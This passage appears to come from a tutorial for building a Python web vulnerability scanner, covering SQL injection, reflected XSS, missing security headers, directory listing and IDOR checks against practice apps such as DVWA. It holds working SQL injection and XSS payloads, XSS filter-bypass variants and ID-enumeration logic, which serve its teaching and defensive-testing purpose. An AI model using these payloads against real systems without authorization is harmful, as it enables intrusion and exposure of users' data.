# Lowercase fragments of database error messages (MySQL, SQL Server, Oracle, PostgreSQL)
SQL_ERRORS = [
    "you have an error in your sql syntax",
    "warning: mysql",
    "unclosed quotation mark",
    "quoted string not properly terminated",
    "sqlexception",
    "microsoft ole db provider for sql server",
    "postgresql query failed",
    "syntax error at or near",
]


def test_sqli_error_based(session: WebSession, url: str, param: str) -> Optional[Vulnerability]:
    payloads = ["'", '"', "' OR '1'='1", "1' AND '1'='1"]

    for payload in payloads:
        response = inject_parameter(session, url, param, payload)
        body = response.text.lower()  # lowercase once per response
        for error in SQL_ERRORS:
            if error in body:
                return Vulnerability(
                    vuln_type="SQL Injection (Error-based)",
                    severity="critical",
                    url=url,
                    parameter=param,
                    payload=payload,
                    evidence=f"SQL error found: {error}",
                    reproduction_steps=[
                        f"1. Navigate to {url}",
                        f"2. Set parameter {param} to: {payload}",
                        f"3. Observe SQL error in response"
                    ],
                    recommendation="Use parameterized queries/prepared statements"
                )
    return None
```
  3. Implement time-based detection:

```python
import time


def test_sqli_time_based(session: WebSession, url: str, param: str) -> Optional[Vulnerability]:
    delay = 5  # seconds
    payloads = [
        f"' AND SLEEP({delay})-- -",          # MySQL: "--" must be followed by whitespace
        f"'; WAITFOR DELAY '0:0:{delay}'--",  # Microsoft SQL Server
        f"' AND pg_sleep({delay})--",         # PostgreSQL
    ]

    # First, get baseline response time
    start = time.monotonic()
    session.get(url)
    baseline = time.monotonic() - start

    for payload in payloads:
        start = time.monotonic()
        inject_parameter(session, url, param, payload)
        elapsed = time.monotonic() - start

        if elapsed >= baseline + delay - 0.5:  # Allow 0.5s tolerance
            return Vulnerability(
                vuln_type="SQL Injection (Time-based Blind)",
                severity="critical",
                url=url,
                parameter=param,
                payload=payload,
                evidence=f"Response took {elapsed:.1f}s against a {baseline:.1f}s baseline (injected delay: {delay}s)",
                reproduction_steps=[...],
                recommendation="Use parameterized queries/prepared statements"
            )
    return None
```

Verification: Detect SQLi in DVWA with security level "low"
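
A single baseline request makes the time-based check sensitive to network jitter. One possible refinement, sketched here with a hypothetical helper named `is_significant_delay`, is to take several baseline samples and compare against their median. The 0.5 second tolerance mirrors the value used in the detection code; the sample timings are illustrative only.

```python
import statistics
from typing import Sequence


def is_significant_delay(baseline_samples: Sequence[float], elapsed: float,
                         injected_delay: float, tolerance: float = 0.5) -> bool:
    """Return True when elapsed exceeds the typical response time by about injected_delay."""
    # The median resists a single slow outlier better than the mean does
    typical = statistics.median(baseline_samples)
    return elapsed >= typical + injected_delay - tolerance


# Three baseline timings in seconds, one of them a network hiccup
baseline = [0.21, 0.19, 2.80]
print(is_significant_delay(baseline, elapsed=5.3, injected_delay=5))
print(is_significant_delay(baseline, elapsed=2.9, injected_delay=5))
```

Repeating a positive result once more before reporting it would further reduce false positives, at the cost of a longer scan.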

Phase 3: XSS Module (Days 6-9)

Goal: Detect reflected XSS vulnerabilities

Implementation steps:

  1. Create XSS payload generator:

```python
import random

XSS_PAYLOADS = [
    '<script>alert(1)</script>',
    '<img src=x onerror=alert(1)>',
    '"><script>alert(1)</script>',
    "'-alert(1)-'",
    '<svg onload=alert(1)>',
]


# Random marker to detect reflection
def generate_xss_marker():
    return f"xss{random.randint(10000, 99999)}"
```


  2. Implement reflection detection:
```python
def test_xss_reflected(session: WebSession, url: str, param: str) -> List[Vulnerability]:
    vulnerabilities = []

    for payload in XSS_PAYLOADS:
        response = inject_parameter(session, url, param, payload)

        # Check if payload is reflected unencoded
        if payload in response.text:
            # Determine context
            context = determine_xss_context(response.text, payload)

            vulnerabilities.append(Vulnerability(
                vuln_type=f"Reflected XSS ({context})",
                severity="high",
                url=url,
                parameter=param,
                payload=payload,
                evidence=f"Payload reflected in {context} context",
                reproduction_steps=[
                    f"1. Navigate to {url}",
                    f"2. Set parameter {param} to: {payload}",
                    f"3. Observe JavaScript execution"
                ],
                recommendation="Encode output based on context (HTML, JS, URL)"
            ))
            break  # Found XSS, no need to test more payloads

    return vulnerabilities

def determine_xss_context(html: str, payload: str) -> str:
    """Determine where payload landed in HTML"""
    soup = BeautifulSoup(html, 'html.parser')

    # Check if in script tag
    for script in soup.find_all('script'):
        if payload in script.text:
            return "JavaScript"

    # Check if in attribute
    for tag in soup.find_all():
        for attr, value in tag.attrs.items():
            if isinstance(value, str) and payload in value:
                return f"Attribute ({attr})"

    return "HTML body"
```

  3. Add filter bypass payloads:
    XSS_BYPASS_PAYLOADS = [
     # Case variation
     '<ScRiPt>alert(1)</ScRiPt>',
     # Event handlers
     '<img src=x onerror=alert(1)>',
     '<body onload=alert(1)>',
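     # Unicode escape in the identifier (JavaScript honors \uXXXX there);
     # the raw string keeps the backslash so it reaches the server literally
     r'<script>\u0061lert(1)</script>',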
     # Double encoding
     '%253Cscript%253Ealert(1)%253C/script%253E',
    ]
    

Verification: Detect XSS in DVWA and OWASP WebGoat
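
The random marker from step 1 can also drive a gentler probe: instead of sending a full payload, send the marker wrapped around each special character and see which characters come back unencoded. The sketch below is one way to do that. `build_marker`, `build_probe`, and `surviving_chars` are hypothetical names, not part of the scanner described above.

```python
import random
import string
from typing import Set

PROBE_CHARS = "<>\"'"  # characters needed to break out of common HTML contexts


def build_marker() -> str:
    """Random alphanumeric marker that is unlikely to occur naturally in a page."""
    return "xss" + "".join(random.choices(string.ascii_lowercase + string.digits, k=8))


def build_probe(marker: str) -> str:
    """Wrap each special character in the marker so its reflection is unambiguous."""
    return "".join(f"{marker}{ch}{marker}" for ch in PROBE_CHARS)


def surviving_chars(body: str, marker: str) -> Set[str]:
    """Return the special characters that were reflected without encoding."""
    return {ch for ch in PROBE_CHARS if f"{marker}{ch}{marker}" in body}


marker = build_marker()
probe = build_probe(marker)
# Simulate a server that encodes angle brackets but leaves quotes alone
body = probe.replace("<", "&lt;").replace(">", "&gt;")
print(sorted(surviving_chars(body, marker)))
```

If only the quote characters survive, tag-based payloads are unlikely to work but attribute breakouts may, which narrows the payload list worth sending.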

Phase 4: Security Headers and Misconfig Detection (Days 9-11)

Goal: Check for missing security headers and misconfigurations

Implementation steps:

  1. Security headers analyzer:

```python
from typing import List

import requests

SECURITY_HEADERS = {
    'Strict-Transport-Security': {
        'severity': 'medium',
        'recommendation': 'Add HSTS header: Strict-Transport-Security: max-age=31536000; includeSubDomains'
    },
    'Content-Security-Policy': {
        'severity': 'medium',
        'recommendation': 'Implement Content Security Policy to prevent XSS'
    },
    'X-Content-Type-Options': {
        'severity': 'low',
        'recommendation': 'Add X-Content-Type-Options: nosniff'
    },
    'X-Frame-Options': {
        'severity': 'medium',
        'recommendation': 'Add X-Frame-Options: DENY or SAMEORIGIN'
    },
    # Legacy header: current browsers no longer ship the XSS auditor it controlled
    'X-XSS-Protection': {
        'severity': 'low',
        'recommendation': 'Add X-XSS-Protection: 1; mode=block'
    }
}


def check_security_headers(response: requests.Response) -> List[Vulnerability]:
    vulnerabilities = []

    for header, info in SECURITY_HEADERS.items():
        # response.headers is case-insensitive, so any header casing matches
        if header not in response.headers:
            vulnerabilities.append(Vulnerability(
                vuln_type=f"Missing Security Header: {header}",
                severity=info['severity'],
                url=response.url,
                parameter="N/A",
                payload="N/A",
                evidence=f"Header {header} not present in response",
                reproduction_steps=[
                    f"1. Request {response.url}",
                    f"2. Inspect response headers",
                    f"3. Note absence of {header}"
                ],
                recommendation=info['recommendation']
            ))

    # Check for information disclosure
    for header in ['Server', 'X-Powered-By', 'X-AspNet-Version']:
        if header in response.headers:
            vulnerabilities.append(Vulnerability(
                vuln_type=f"Information Disclosure: {header}",
                severity='low',
                url=response.url,
                parameter="N/A",
                payload="N/A",
                evidence=f"{header}: {response.headers[header]}",
                reproduction_steps=[...],
                recommendation=f"Remove or genericize {header} header"
            ))

    return vulnerabilities
```
  2. Directory listing detection:
    def check_directory_listing(session: WebSession, base_url: str) -> List[Vulnerability]:
     common_dirs = ['/images/', '/uploads/', '/static/', '/assets/', '/css/', '/js/']
     vulnerabilities = []
    
     for directory in common_dirs:
         url = urljoin(base_url, directory)
         response = session.get(url)
    
         if response.status_code == 200:
             if 'Index of' in response.text or 'Directory listing' in response.text:
                 vulnerabilities.append(Vulnerability(
                     vuln_type="Directory Listing Enabled",
                     severity="low",
                     url=url,
                     parameter="N/A",
                     payload="N/A",
                     evidence="Directory contents visible",
                     reproduction_steps=[f"Navigate to {url}"],
                     recommendation="Disable directory listing in web server config"
                 ))
    
     return vulnerabilities
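
The header analyzer only checks whether a header is present. A header can be present and still be weak, for example an HSTS policy with a very short `max-age`. The following sketch shows one way to inspect the value; `hsts_max_age` and `hsts_is_weak` are hypothetical helpers, and the one-year threshold is taken from the recommendation string used in the analyzer.

```python
from typing import Optional


def hsts_max_age(header_value: str) -> Optional[int]:
    """Extract max-age (in seconds) from a Strict-Transport-Security value, or None."""
    for directive in header_value.split(";"):
        name, _, value = directive.strip().partition("=")
        if name.lower() == "max-age":
            try:
                # The value may be quoted, so strip surrounding double quotes
                return int(value.strip().strip('"'))
            except ValueError:
                return None
    return None


def hsts_is_weak(header_value: str, minimum: int = 31536000) -> bool:
    """True when max-age is missing, malformed, or shorter than minimum (one year by default)."""
    age = hsts_max_age(header_value)
    return age is None or age < minimum


print(hsts_is_weak("max-age=300"))
print(hsts_is_weak("max-age=31536000; includeSubDomains"))
```

A weak value would probably deserve a lower severity than a missing header, since some protection is still in place.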
    

Phase 5: IDOR and Access Control (Days 11-13)

Goal: Detect insecure direct object references

Implementation steps:

  1. Identify numeric parameters:
    def find_numeric_params(crawl_results: List[CrawlResult]) -> List[tuple]:
     """Find all numeric ID parameters"""
     id_params = []
    
     for result in crawl_results:
         for param in result.parameters:
             # Check if value is numeric
             if param.value.isdigit():
                 id_params.append((result.url, param.name, param.value))
    
     return id_params
    
  2. Test for IDOR:

```python
def test_idor(session: WebSession, url: str, param: str, original_id: str) -> Optional[Vulnerability]:
    """Test if changing ID returns different user's data"""

    # Get original response
    original_response = session.get(url)

    # Try adjacent IDs
    test_ids = [
        str(int(original_id) + 1),
        str(int(original_id) - 1),
        str(int(original_id) * 2),
    ]

    for test_id in test_ids:
        modified_url = url.replace(f"{param}={original_id}", f"{param}={test_id}")
        test_response = session.get(modified_url)

        # If we get a 200 with different content, potential IDOR
        if test_response.status_code == 200:
            if test_response.text != original_response.text:
                # Further analysis: does it contain PII-like data?
                if contains_pii_indicators(test_response.text):
                    return Vulnerability(
                        vuln_type="Insecure Direct Object Reference (IDOR)",
                        severity="high",
                        url=url,
                        parameter=param,
                        payload=f"Changed {original_id} to {test_id}",
                        evidence="Different data returned for modified ID",
                        reproduction_steps=[
                            f"1. Request original: {url}",
                            f"2. Modify {param} from {original_id} to {test_id}",
                            f"3. Observe different user data returned"
                        ],
                        recommendation="Implement proper authorization checks"
                    )
    return None


def contains_pii_indicators(text: str) -> bool:
    """Check if response might contain personal data"""
    indicators = ['email', 'phone', 'address', 'ssn', 'password', 'credit', 'account']
    lowered = text.lower()
    return any(ind in lowered for ind in indicators)
```
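
Comparing response bodies with `!=` flags any difference, including a timestamp or a CSRF token that changes on every request. A rough similarity score can separate "same template, different record" from "identical page" and from "error page". The sketch below uses the standard library's `difflib`; the function names and the 0.5 and 0.98 thresholds are assumptions that would need tuning per target.

```python
from difflib import SequenceMatcher


def response_similarity(a: str, b: str) -> float:
    """Similarity ratio in [0, 1]; 1.0 means the two bodies are identical."""
    return SequenceMatcher(None, a, b).ratio()


def looks_like_other_record(original: str, candidate: str,
                            low: float = 0.5, high: float = 0.98) -> bool:
    """Heuristic: similar enough to share a template, different enough to be another record."""
    score = response_similarity(original, candidate)
    return low <= score < high


alice = "<h1>Profile</h1><p>Name: Alice</p><p>Email: alice@example.com</p>"
bob = "<h1>Profile</h1><p>Name: Bob</p><p>Email: bob@example.com</p>"
print(looks_like_other_record(alice, bob))
print(looks_like_other_record(alice, alice))
print(looks_like_other_record(alice, "404 Not Found"))
```

`SequenceMatcher` is slow on large pages, so a real scanner might compare only a truncated body or the extracted text.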


Phase 6: Reporting and Integration (Days 13-14)

Goal: Generate professional vulnerability reports

Implementation steps:

  1. Report generator:
```python
from datetime import datetime

from jinja2 import Template

def generate_html_report(vulnerabilities: List[Vulnerability], target: str) -> str:
    template = Template('''
    <!DOCTYPE html>
    <html>
    <head>
        <title>Vulnerability Scan Report - {{ target }}</title>
        <style>
            .critical { background-color: #ff4444; color: white; }
            .high { background-color: #ff8800; color: white; }
            .medium { background-color: #ffbb33; }
            .low { background-color: #99cc00; }
            .finding { border: 1px solid #ccc; margin: 10px; padding: 15px; }
        </style>
    </head>
    <body>
        <h1>Vulnerability Scan Report</h1>
        <h2>Target: {{ target }}</h2>
        <h2>Scan Date: {{ scan_date }}</h2>

        <h3>Summary</h3>
        <ul>
            <li class="critical">Critical: {{ critical_count }}</li>
            <li class="high">High: {{ high_count }}</li>
            <li class="medium">Medium: {{ medium_count }}</li>
            <li class="low">Low: {{ low_count }}</li>
        </ul>

        <h3>Findings</h3>
        {% for vuln in vulnerabilities %}
        <div class="finding {{ vuln.severity }}">
            <h4>{{ vuln.vuln_type }}</h4>
            <p><strong>URL:</strong> {{ vuln.url }}</p>
            <p><strong>Parameter:</strong> {{ vuln.parameter }}</p>
            <p><strong>Payload:</strong> <code>{{ vuln.payload }}</code></p>
            <p><strong>Evidence:</strong> {{ vuln.evidence }}</p>
            <p><strong>Recommendation:</strong> {{ vuln.recommendation }}</p>
        </div>
        {% endfor %}
    </body>
    </html>
    ''', autoescape=True)  # escape payload text so it renders inert inside the report

    return template.render(
        target=target,
        scan_date=datetime.now().isoformat(),
        vulnerabilities=vulnerabilities,
        critical_count=sum(1 for v in vulnerabilities if v.severity == 'critical'),
        high_count=sum(1 for v in vulnerabilities if v.severity == 'high'),
        medium_count=sum(1 for v in vulnerabilities if v.severity == 'medium'),
        low_count=sum(1 for v in vulnerabilities if v.severity == 'low'),
    )
```

  2. JSON export for tool integration:
    import json
    from dataclasses import asdict
    from datetime import datetime

    def export_json(vulnerabilities: List[Vulnerability], filepath: str):
        data = {
            'scan_date': datetime.now().isoformat(),
            'total_findings': len(vulnerabilities),
            # asdict requires Vulnerability to be a dataclass
            'findings': [asdict(v) for v in vulnerabilities]
        }
        with open(filepath, 'w') as f:
            json.dump(data, f, indent=2)
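
Both report functions rely on the shape of `Vulnerability`: the template reads its attributes and `asdict` needs a dataclass. The sketch below assumes a dataclass with the field names used throughout this guide (the defaults are an assumption) and adds a hypothetical `sort_by_severity` helper so the most serious findings appear first.

```python
from dataclasses import asdict, dataclass, field
from typing import List

SEVERITY_ORDER = {"critical": 0, "high": 1, "medium": 2, "low": 3}


@dataclass
class Vulnerability:
    vuln_type: str
    severity: str
    url: str
    parameter: str
    payload: str
    evidence: str
    reproduction_steps: List[str] = field(default_factory=list)
    recommendation: str = ""


def sort_by_severity(findings: List[Vulnerability]) -> List[Vulnerability]:
    """Most severe first; unknown severity labels sort last."""
    return sorted(findings, key=lambda v: SEVERITY_ORDER.get(v.severity, len(SEVERITY_ORDER)))


findings = [
    Vulnerability("Missing Security Header: X-Frame-Options", "medium", "http://localhost/", "N/A", "N/A", "Header absent"),
    Vulnerability("SQL Injection (Error-based)", "critical", "http://localhost/item?id=1", "id", "'", "SQL error found"),
]
for finding in sort_by_severity(findings):
    print(finding.severity, finding.vuln_type)
print(sorted(asdict(findings[0]).keys()))
```

Passing `sort_by_severity(vulnerabilities)` to the template and the JSON export would keep both outputs in the same order.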
    

Testing Strategy

Testing Against Intentionally Vulnerable Applications

  1. DVWA (Damn Vulnerable Web Application)
    • Test at "Low" security level first
    • Progress through Medium and High
    • Your scanner should find SQLi and XSS at Low
  2. OWASP WebGoat
    • Structured lessons for each vulnerability type
    • Verify your scanner finds the intended vulnerabilities
  3. OWASP Juice Shop
    • Modern JavaScript-heavy application
    • Tests your crawler's ability to handle SPAs

Unit Testing Payloads

def test_sqli_payloads_detected():
    # Test against known vulnerable responses
    vulnerable_response = "You have an error in your SQL syntax"
    assert is_sqli_error(vulnerable_response)

    clean_response = "No products found"
    assert not is_sqli_error(clean_response)

def test_xss_reflection_detection():
    html = '<input value="<script>alert(1)</script>">'
    assert detect_xss_reflection(html, '<script>alert(1)</script>')
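
These tests call `is_sqli_error` and `detect_xss_reflection`, which this section does not define. A minimal sketch of what they might look like, assuming they are pure functions over the response body, extracted from the detection modules so they can be tested without network access:

```python
# A subset of the error signatures from the SQL injection module
SQL_ERROR_SIGNATURES = [
    "you have an error in your sql syntax",
    "unclosed quotation mark",
    "quoted string not properly terminated",
    "syntax error at or near",
]


def is_sqli_error(body: str) -> bool:
    """True when the body contains a known database error fragment."""
    lowered = body.lower()
    return any(signature in lowered for signature in SQL_ERROR_SIGNATURES)


def detect_xss_reflection(body: str, payload: str) -> bool:
    """True when the payload appears in the body exactly as it was sent."""
    return payload in body


print(is_sqli_error("You have an error in your SQL syntax"))
print(detect_xss_reflection("<p>&lt;script&gt;</p>", "<script>"))
```

Keeping the matching logic separate from the HTTP calls is what makes this kind of unit test possible.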

Common Pitfalls and Debugging

1. "False positives everywhere"

Problem: Scanner reports vulnerabilities that aren't real

Solutions:

  • Verify by actually exploiting (does payload execute?)
  • Add confidence scoring
  • Require multiple indicators before reporting
  • Filter out honeypot/WAF responses
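
Confidence scoring and "multiple indicators" can be combined in one small function. The sketch below is only an illustration: the indicator names, weights, and the 0.6 threshold are all hypothetical and would need calibrating against known-vulnerable and known-clean targets.

```python
from typing import Dict

# Hypothetical weights for independent pieces of evidence
INDICATOR_WEIGHTS: Dict[str, float] = {
    "error_signature": 0.5,    # database error text appeared in the response
    "payload_reflected": 0.3,  # payload came back unencoded
    "timing_delay": 0.4,       # response was delayed by the injected amount
    "reproduced_twice": 0.3,   # the same result was observed on a second attempt
}


def confidence(indicators: Dict[str, bool]) -> float:
    """Sum the weights of the indicators that fired, capped at 1.0."""
    score = sum(INDICATOR_WEIGHTS.get(name, 0.0)
                for name, fired in indicators.items() if fired)
    return min(score, 1.0)


def should_report(indicators: Dict[str, bool], threshold: float = 0.6) -> bool:
    """Report only when the combined evidence reaches the threshold."""
    return confidence(indicators) >= threshold


print(should_report({"error_signature": True}))
print(should_report({"error_signature": True, "reproduced_twice": True}))
```

With these weights no single indicator is enough on its own, which is one way to enforce the "require multiple indicators" rule.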

2. "Missing obvious vulnerabilities"

Problem: Known vulnerable app, scanner finds nothing

Debug steps:

  1. Is the crawler finding the vulnerable pages?
  2. Is the parameter being tested?
  3. Check if WAF is blocking payloads
  4. Try different payload encodings
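
For the last step, a helper that produces several encodings of one payload makes it easy to retry a test systematically. This is a sketch with a hypothetical `encoding_variants` function built on standard-library calls.

```python
import html
from typing import Dict
from urllib.parse import quote


def encoding_variants(payload: str) -> Dict[str, str]:
    """Return the payload in a few common encodings, keyed by a descriptive label."""
    url_once = quote(payload, safe="")
    return {
        "raw": payload,
        "url": url_once,
        # Encoding the already-encoded string turns "%" into "%25"
        "double_url": quote(url_once, safe=""),
        "html_entity": html.escape(payload, quote=True),
    }


for label, variant in encoding_variants("<script>alert(1)</script>").items():
    print(f"{label:12} {variant}")
```

Note that `inject_parameter` passes values through `urlencode`, which adds its own layer of percent-encoding, so the bytes on the wire should be checked in a proxy or debug log before drawing conclusions.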

3. "Crawler goes off-site or loops forever"

Problem: Crawler follows external links or revisits pages

Solutions:

  • Strict domain checking
  • Track visited URLs in a set
  • Set maximum crawl depth
  • Implement timeout per page
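
Revisits often come from URLs that differ only in a fragment, letter case in the host, or a trailing slash. A sketch of URL normalization plus a combined scope and depth check follows; `normalize_url` and `in_scope` are hypothetical helpers, and the default depth of 3 is arbitrary.

```python
from urllib.parse import urldefrag, urlparse


def normalize_url(url: str) -> str:
    """Drop the fragment, lowercase the host, and trim the trailing slash."""
    without_fragment, _fragment = urldefrag(url)
    parsed = urlparse(without_fragment)
    path = parsed.path.rstrip("/") or "/"
    return parsed._replace(netloc=parsed.netloc.lower(), path=path).geturl()


def in_scope(url: str, start_url: str, depth: int, max_depth: int = 3) -> bool:
    """True when the URL is on the starting host and within the depth limit."""
    same_host = urlparse(url).netloc.lower() == urlparse(start_url).netloc.lower()
    return same_host and depth <= max_depth


print(normalize_url("http://Example.com/a/#top"))
print(in_scope("http://evil.test/", "http://example.com/", depth=1))
```

To use the depth limit, the crawl queue would hold `(url, depth)` pairs and the visited set would store normalized URLs. Trimming the trailing slash is a simplification: a few servers treat `/a` and `/a/` as different resources.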

4. "XSS not detected even when payload reflects"

Problem: Payload in response but not marked as XSS

Debug steps:

  1. Is response HTML or JSON?
  2. Is payload HTML-encoded in response?
  3. Check if context detection is working
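
The first two debug questions can be answered in code before the context detection even runs. The sketch below classifies a reflection by content type and encoding; `classify_reflection` and its four labels are hypothetical.

```python
import html


def classify_reflection(body: str, payload: str, content_type: str) -> str:
    """Classify how (or whether) the payload came back in the response."""
    media_type = content_type.split(";")[0].strip().lower()
    if payload in body:
        # A raw reflection only matters if the browser will parse the body as HTML
        if media_type in ("text/html", "application/xhtml+xml"):
            return "raw-html"
        return "raw-non-html"
    # Check both escaping styles: with and without quote characters encoded
    if html.escape(payload, quote=True) in body or html.escape(payload, quote=False) in body:
        return "encoded"
    return "absent"


payload = "<script>alert(1)</script>"
print(classify_reflection(f"<p>{payload}</p>", payload, "text/html; charset=utf-8"))
print(classify_reflection('{"q": "' + payload + '"}', payload, "application/json"))
print(classify_reflection(html.escape(payload), payload, "text/html"))
```

Only the `raw-html` case is a strong XSS candidate. A raw reflection in JSON may still be exploitable if another page inserts it into the DOM, but that takes manual verification.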

Extensions and Challenges

Beginner Extensions

  1. Add more payloads: Load from external files
  2. Progress reporting: Show real-time scan progress
  3. Proxy support: Route through Burp Suite
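
The first extension needs little more than a file reader. The sketch below assumes one payload per line and treats lines starting with `#` as comments; that file convention and the `load_payloads` name are assumptions, not something the scanner prescribes.

```python
import os
import tempfile
from pathlib import Path
from typing import List


def load_payloads(path: str) -> List[str]:
    """Read one payload per line, skipping blank lines and '#' comment lines."""
    lines = Path(path).read_text(encoding="utf-8").splitlines()
    return [line for line in lines if line.strip() and not line.startswith("#")]


# Demonstrate with a throwaway file
with tempfile.TemporaryDirectory() as tmp:
    sample = os.path.join(tmp, "xss.txt")
    Path(sample).write_text("# reflected XSS\n<svg onload=alert(1)>\n\n'-alert(1)-'\n", encoding="utf-8")
    print(load_payloads(sample))
```

Proxy support is similarly small with `requests`: setting `session.proxies = {"http": proxy_url, "https": proxy_url}` on the `requests.Session` inside `WebSession` routes traffic through an intercepting proxy. Burp Suite listens on `127.0.0.1:8080` by default.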

Intermediate Extensions

  1. JavaScript rendering: Use Selenium for SPAs
  2. CSRF detection: Check for missing tokens
  3. Session handling: Test with authenticated sessions

Advanced Extensions

  1. WAF bypass payloads: Encoding and obfuscation
  2. API fuzzing: REST/GraphQL vulnerability testing
  3. SSRF detection: With callback server
  4. Stored XSS: Re-check pages for persisted payloads

Real-World Connections

Commercial Scanners

Your project is a simplified version of:

  • Burp Suite Pro - Industry standard web scanner
  • OWASP ZAP - Open source alternative
  • Nuclei - Template-based vulnerability scanner

After this project, study how these tools work; they are built on the same concepts but with years of refinement.

Bug Bounty Application

These skills directly apply to bug bounty:

  • Subdomain enumeration → More attack surface
  • Automated scanning → Find low-hanging fruit
  • Manual verification → Avoid duplicate reports
  • Report writing → Get paid faster

Self-Assessment Checklist

Core Functionality

  • Crawler discovers all pages and forms
  • SQLi detection works (error-based and time-based)
  • XSS detection works (reflected)
  • Security headers are checked
  • HTML report is generated

Code Quality

  • Modular design (can add new modules easily)
  • Error handling (doesn't crash on edge cases)
  • Configuration options (timeout, threads, etc.)
  • CLI with --help

Understanding

  • Can explain how SQL injection works at query level
  • Understand difference between XSS contexts
  • Know why parameterized queries prevent SQLi
  • Understand OWASP Top 10 categories

Validation

  • Finds vulnerabilities in DVWA (low security)
  • Minimal false positives on clean application
  • Report is professional quality

Resources

Primary Reading

  • "Bug Bounty Bootcamp" by Vickie Li - Chapters 6-12
  • "The Web Application Hacker's Handbook" by Stuttard & Pinto
  • "HTTP: The Definitive Guide" by David Gourley

Online Resources

Practice Environments

  • DVWA - docker run -p 80:80 vulnerables/web-dvwa
  • OWASP WebGoat - docker run -p 8080:8080 webgoat/webgoat
  • OWASP Juice Shop - docker run -p 3000:3000 bkimminich/juice-shop

This project is part of the Ethical Hacking & Penetration Testing learning path.